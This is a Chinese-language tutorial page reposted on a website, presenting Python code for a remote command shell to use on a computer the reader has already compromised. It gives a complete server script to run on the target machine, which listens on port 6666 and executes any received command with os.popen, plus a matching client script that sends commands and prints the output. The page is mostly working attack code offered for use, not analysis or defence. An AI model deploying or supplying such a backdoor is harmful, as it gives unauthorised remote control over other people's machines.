您好,登錄后才能下訂單哦!
有的時候我們在獲取到目標電腦時候如果對方電腦又python 編譯環(huán)境時可以利用python 反彈shell
主要用到python os庫和sokect庫
這里的服務端在目標機上運行
from socket import * from os import * s=socket(AF_INET,SOCK_STREAM)#IVP4 尋址 tcp協(xié)議 s.bind(('',6666))#補丁端口 s.listen(1)#開始監(jiān)聽一個隊列 while True: sock,addr=s.accept()#返回兩次 第一次返回連接地址 二 端口號 print ('客戶端:',addr) while True: cmd=sock.recv(1024)#緩存長度 接收傳遞過來 cmdstr=cmd.decode() if cmdstr=='exit': print ('客戶端:',addr,'關閉') sock.close() break result=popen(cmdstr).read() sock.send(result.encode()) s.close()
本機運行
from socket import * from os import * c=socket(AF_INET,SOCK_STREAM)#IVP4 尋址 tcp協(xié)議 c.connect(('127.0.0.1',6666))#連接地址 while True: cmd=input("cmd:") c.send(cmd.encode())#必須傳遞流 if cmd=='exit': c.close() break data=c.recv(1014) print (data.decode())
總結
以上所述是小編給大家介紹的python模擬菜刀反彈shell繞過限制,希望對大家有所幫助,如果大家有任何疑問歡迎給我留言,小編會及時回復大家的!
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。